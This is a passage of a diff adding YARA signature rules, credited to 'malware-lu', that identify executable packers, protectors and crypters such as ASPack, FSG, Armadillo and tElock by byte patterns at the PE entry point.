+	$a1 = { 06 60 C8 ?? ?? ?? 0E 68 ?? ?? 9A ?? ?? ?? ?? 3D ?? ?? 0F ?? ?? ?? 50 50 0E 68 ?? ?? 9A ?? ?? ?? ?? 0E }
+	$a2 = { 53 E8 ?? ?? ?? ?? 5B 8B C3 2D ?? ?? ?? ?? 50 81 ?? ?? ?? ?? ?? 8B }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PackmanV10BrandonLaCombe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B C6 01 1B 8B 13 8D 73 14 6A 08 59 01 16 AD 49 75 FA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PEX099Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 55 83 C4 04 E8 01 00 00 00 90 5D 81 FF FF FF 00 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PAKSFXArchive
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 ?? ?? A1 ?? ?? 2E ?? ?? ?? 2E ?? ?? ?? ?? ?? 8C D7 8E C7 8D ?? ?? BE ?? ?? FC AC 3C 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv2xxAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }
+	$a1 = { A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule SimbiOZ13Extranger
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 57 57 8D 7C 24 04 50 B8 00 ?? ?? ?? AB 58 5F C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule muckisprotectorImucki
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8A 06 F6 D0 88 06 46 E2 F7 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1339ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LOCK98V10028keenvim
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 00 00 00 00 5D 81 ?? ?? ?? ?? ?? EB 05 E9 ?? ?? ?? ?? EB 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule iPBProtectv013
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 4B 43 55 46 68 54 49 48 53 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 FA 33 DB 89 5D F8 6A 02 EB 01 F8 58 5F 5E 5B 64 8B 25 00 00 00 00 64 8F 05 00 00 00 00 58 58 58 5D 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 }
+
+condition:
+		$a0
+}
+	
+	
+rule PrivateEXEProtector197SetiSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F4 FC 53 57 56 8B 74 24 20 8B 7C 24 24 66 81 3E 4A 43 0F 85 A5 02 00 00 83 C6 0A 33 DB BA 00 00 00 80 C7 44 24 14 08 00 00 00 43 8D A4 24 00 00 00 00 8B FF 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 73 2C 8B 4C 24 10 33 C0 8D A4 24 00 00 00 00 05 00 00 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 02 44 24 0C 88 07 47 EB C6 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 0F 82 6E 01 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 0F 83 DC 00 00 00 B9 04 00 00 00 33 C0 8D A4 24 00 00 00 00 8D 64 24 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 48 74 B1 0F 89 EF 01 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 73 42 BD 00 01 00 00 B9 08 00 00 00 33 C0 8D A4 24 00 00 00 00 05 00 00 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 88 07 47 4D 75 D6 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv21AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv103bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01PEIntro10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 9C 60 E8 14 00 00 00 5D 81 ED 0A 45 40 90 80 BD 67 44 40 90 90 0F 85 48 FF ED 0A E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv099SpecialBuildheXerforgot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 ?? ?? 00 F5 ?? ?? 00 ED ?? ?? 00 00 00 00 00 00 00 00 00 12 ?? ?? 00 FD ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 }
+	$a1 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 ?? ?? 00 F5 ?? ?? 00 ED ?? ?? 00 00 00 00 00 00 00 00 00 12 ?? ?? 00 FD ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxBackfont900
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? B4 30 CD 21 3C 03 ?? ?? B8 ?? ?? BA ?? ?? CD 21 81 FA ?? ?? ?? ?? BA ?? ?? 8C C0 48 8E C0 8E D8 80 ?? ?? ?? 5A ?? ?? 03 ?? ?? ?? 40 8E D8 80 ?? ?? ?? 5A ?? ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPEv20xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 55 BB ?? ?? ?? ?? 03 DD 53 64 67 FF 36 ?? ?? 64 67 89 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Litev003a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 06 FC 1E 07 BE ?? ?? ?? ?? 6A 04 68 ?? 10 ?? ?? 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack1XMethod2bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 ?? 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEncryptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C BE 00 10 40 00 8B FE B9 28 03 00 00 BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BJFntv12RC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FishPEShield112116HellFish
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8B 45 10 83 C0 0C 8B 00 89 45 DC 83 7D DC 00 75 08 E8 BD FE FF FF 89 45 DC E8 E1 FD FF FF 8B 00 03 45 DC 89 45 E4 E8 DC FE FF FF 8B D8 BA 8E 4E 0E EC 8B C3 E8 2E FF FF FF 89 45 F4 BA 04 49 32 D3 8B C3 E8 1F FF FF FF 89 45 F8 BA 54 CA AF 91 8B C3 E8 10 FF FF FF 89 45 F0 BA AC 33 06 03 8B C3 E8 01 FF FF FF 89 45 EC BA 1B C6 46 79 8B C3 E8 F2 FE FF FF 89 45 E8 BA AA FC 0D 7C 8B C3 E8 E3 FE FF FF 89 45 FC 8B 45 E4 8B 58 04 03 5D E4 8B FB 8B 45 E4 8B 30 4E 85 F6 72 2B }
+	$a1 = { 60 E8 EA FD FF FF FF D0 C3 8D 40 00 ?? 00 00 00 2C 00 00 00 ?? ?? ?? 00 ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 ?? ?? 00 ?? ?? 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 00 00 ?? ?? ?? 00 40 ?? ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 40 ?? ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 40 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule CodeCryptv016bv0163b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VOBProtectCD
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5F 81 EF ?? ?? ?? ?? BE ?? ?? 40 ?? 8B 87 ?? ?? ?? ?? 03 C6 57 56 8C A7 ?? ?? ?? ?? FF 10 89 87 ?? ?? ?? ?? 5E 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule diProtectorV1XdiProtectorSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 00 A0 E3 14 00 00 EB 00 00 20 E0 44 10 9F E5 03 2A A0 E3 40 30 A0 E3 AE 00 00 EB 30 00 8F E5 00 20 A0 E1 3A 0E 8F E2 00 00 80 E2 1C 10 9F E5 20 30 8F E2 0E 00 00 EB 14 00 9F E5 14 10 9F E5 7F 20 A0 E3 C5 00 00 EB 04 C0 8F E2 00 F0 9C E5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateexeProtector20SetiSoftTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule AHTeamEPProtector03fakekkryptor9kryptoraFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 ?? ?? ?? ?? 5E B9 00 00 00 00 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEBundlev310
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 00 87 DD ?? ?? ?? ?? 40 00 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule NsPack34NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC280290EXEX86CRTLIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 83 EC ?? 53 56 57 89 65 E8 68 00 00 00 ?? E8 ?? ?? ?? ?? 59 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV115V117Dllap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC28x45xPelleOrinius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstallv2460Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 F4 18 40 00 50 E8 87 FC FF FF 59 59 A1 94 1A 40 00 8B 40 10 03 05 90 1A 40 00 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 76 0C 00 00 D4 0C 00 00 1E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110Engdulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 ?? BF ?? 10 40 ?? BE }
+	$a1 = { E8 01 00 00 00 ?? ?? E8 ?? 00 00 00 }
+	$a2 = { EB 01 ?? EB 02 ?? ?? ?? 80 ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PECompactv2xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv10802AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo440SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 2E 31 2E 34 00 00 00 C2 E0 94 BE 93 FC DE C6 B6 24 83 F7 D2 A4 92 77 40 27 CF EB D8 6F 50 B4 B5 29 24 FA 45 08 04 52 D5 1B D2 8C 8A 1E 6E FF 8C 5F 42 89 F1 83 B1 27 C5 69 57 FC 55 0A DD 44 BE 2A 02 97 6B 65 15 AA 31 E9 28 7D 49 1B DF B5 5D 08 A8 BA A8 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov1xxv2xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv111c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 86 E0 3D ?? ?? 73 ?? B4 ?? CD 21 B0 ?? B4 4C CD 21 53 BB ?? ?? 5B EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealth276UnregisteredWebtoolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02LCCWin32DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 90 90 90 FF 75 10 FF 75 0C FF 75 08 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CDSSSv10Beta1CyberDoomTeamX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED CA 47 40 00 FF 74 24 20 E8 D3 03 00 00 0B C0 0F 84 13 03 00 00 89 85 B8 4E 40 00 66 8C D8 A8 04 74 0C C7 85 8C 4E 40 00 01 00 00 00 EB 12 64 A1 30 00 00 00 0F B6 40 02 0A C0 0F 85 E8 02 00 00 8D 85 F6 4C 40 00 50 FF B5 B8 4E 40 00 E8 FC 03 00 00 0B C0 0F 84 CE 02 00 00 E8 1E 03 00 00 89 85 90 4E 40 00 8D 85 03 4D 40 00 50 FF B5 B8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv041x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 8B C0 8D 24 24 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 50 8B FE 68 78 01 ?? ?? 59 EB 01 EB AC 54 E8 03 ?? ?? ?? 5C EB 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ZCodeWin32PEProtectorv101
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 12 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E9 FB FF FF FF C3 68 ?? ?? ?? ?? 64 FF 35 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ABCCryptor10byZloY
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 FF 64 24 F0 68 58 58 58 58 90 FF D4 50 8B 40 F2 05 B0 95 F6 95 0F 85 01 81 BB FF 68 ?? ?? ?? ?? BF 00 ?? ?? ?? B9 00 ?? ?? ?? 80 37 ?? 47 39 CF 75 F8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BF 00 ?? ?? ?? B9 00 ?? ?? ?? 80 37 ?? 47 39 CF 75 F8 }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv120EngdulekxtMicrosoftVisualC60
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SLVc0deProtectorv061SLV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 }
+	$a1 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FSG131dulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV112V114aPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF EB 0F FF ?? ?? ?? FF ?? ?? ?? D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB }
+
+condition:
+		$a0
+}
+	
+	
+rule Crypter31SLESH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 FF 64 24 F0 68 58 58 58 58 FF D4 50 8B 40 F2 05 B0 95 F6 95 0F 85 01 81 BB FF 68 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01VBOX43MTEAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeBJFNT13emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeCryptor02build002GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 D2 90 1E 68 1B ?? ?? ?? 0F A0 1F 8B 02 90 50 54 8F 02 90 90 8E 64 24 08 FF E2 58 50 33 D2 52 83 F8 01 9B 40 8A 10 89 14 24 90 D9 04 24 90 D9 FA D9 5C 24 FC 8B 5C 24 FC 81 F3 C2 FC 1D 1C 75 E3 74 01 62 FF D0 90 5A 33 C0 8B 54 24 08 90 64 8F 00 90 83 C2 08 52 5C 5A }
+
+condition:
+		$a0
+}
+	
+	
+rule PackItBitchV10archphase
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule nPackv11250BetaNEOx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D 04 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 46 00 00 00 E8 73 00 00 00 B8 2E ?? ?? ?? 2B 05 08 ?? ?? ?? A3 00 ?? ?? ?? E8 9C 00 00 00 E8 04 02 00 00 E8 FB 06 00 00 E8 1B 06 00 00 A1 00 ?? ?? ?? C7 05 04 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnpackedBSSFXArchivev19
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 33 C0 50 B8 ?? ?? 8E D8 FA 8E D0 BC ?? ?? FB B8 ?? ?? CD 21 3C 03 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01VideoLanClientAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 FF FF 01 01 01 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 00 01 00 01 90 90 00 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PECompact14Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 EB 06 68 90 90 90 90 C3 9C 60 E8 02 90 90 90 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01DxPack10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 90 90 90 90 2B B9 00 00 00 00 81 EF 90 90 90 90 83 BD 90 90 90 90 90 0F 84 00 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Splice11byTw1stedL0gic
+{
+      meta:
+		author="malware-lu"
+strings:
